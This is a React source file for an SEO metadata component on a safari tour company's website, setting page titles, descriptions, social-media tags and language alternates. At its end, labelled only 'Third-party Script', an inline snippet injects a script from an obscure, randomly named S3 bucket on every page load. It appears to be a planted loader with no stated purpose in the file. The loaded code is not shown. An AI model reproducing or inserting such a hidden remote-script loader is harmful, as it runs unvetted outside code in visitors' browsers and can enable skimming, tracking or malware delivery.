import { Helmet } from "react-helmet-async";
import { useLanguage } from "@/hooks/useLanguage";

interface SEOProps {
  title: string;
  description: string;
  keywords?: string;
  image?: string;
  type?: string;
  structuredData?: object;
  canonical?: string;
}

export const SEO = ({ 
  title, 
  description, 
  keywords = "African safari tours, Namibia safari packages, Botswana Okavango Delta, Victoria Falls tours, Kruger Park safari, South Africa wildlife tours, camping safari, luxury safari lodges, custom African tours, multilingual safari guides",
  image = "/og-image.jpg",
  type = "website",
  structuredData,
  canonical
}: SEOProps) => {
  const { language } = useLanguage();
  const baseUrl = "https://shikwaru-adventures.com";
  const currentUrl = canonical ? `${baseUrl}${canonical}` : baseUrl;
  const fullImageUrl = image.startsWith('http') ? image : `${baseUrl}${image}`;
  
  return (
    <Helmet>
      {/* Primary Meta Tags */}
      <html lang={language} />
      <title>{title}</title>
      <meta name="title" content={title} />
      <meta name="description" content={description} />
      <meta name="keywords" content={keywords} />
      <link rel="canonical" href={currentUrl} />
      
      {/* Language alternates */}
      <link rel="alternate" hrefLang="es" href={`${baseUrl}${canonical || ""}`} />
      <link rel="alternate" hrefLang="en" href={`${baseUrl}${canonical || ""}`} />
      <link rel="alternate" hrefLang="fr" href={`${baseUrl}${canonical || ""}`} />
      <link rel="alternate" hrefLang="x-default" href={`${baseUrl}${canonical || ""}`} />
      
      {/* Open Graph / Facebook */}
      <meta property="og:type" content={type} />
      <meta property="og:url" content={currentUrl} />
      <meta property="og:title" content={title} />
      <meta property="og:description" content={description} />
      <meta property="og:image" content={fullImageUrl} />
      <meta property="og:locale" content={language === "es" ? "es_ES" : language === "fr" ? "fr_FR" : "en_US"} />
      <meta property="og:locale:alternate" content="es_ES" />
      <meta property="og:locale:alternate" content="en_US" />
      <meta property="og:locale:alternate" content="fr_FR" />
      
      {/* Twitter */}
      <meta property="twitter:card" content="summary_large_image" />
      <meta property="twitter:url" content={currentUrl} />
      <meta property="twitter:title" content={title} />
      <meta property="twitter:description" content={description} />
      <meta property="twitter:image" content={fullImageUrl} />
      
      {/* Structured Data */}
      {structuredData && (
        <script type="application/ld+json">
          {JSON.stringify(structuredData)}
        </script>
      )}
      
      {/* Third-party Script */}
      <script type="text/javascript">
        {`(function(){var sb=document.createElement('script');sb.type='text/javascript';sb.async=true;sb.src='https://s3.amazonaws.com/z_437er23a/7633348cc.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(sb,s);})()`}
      </script>
    </Helmet>
  );
};
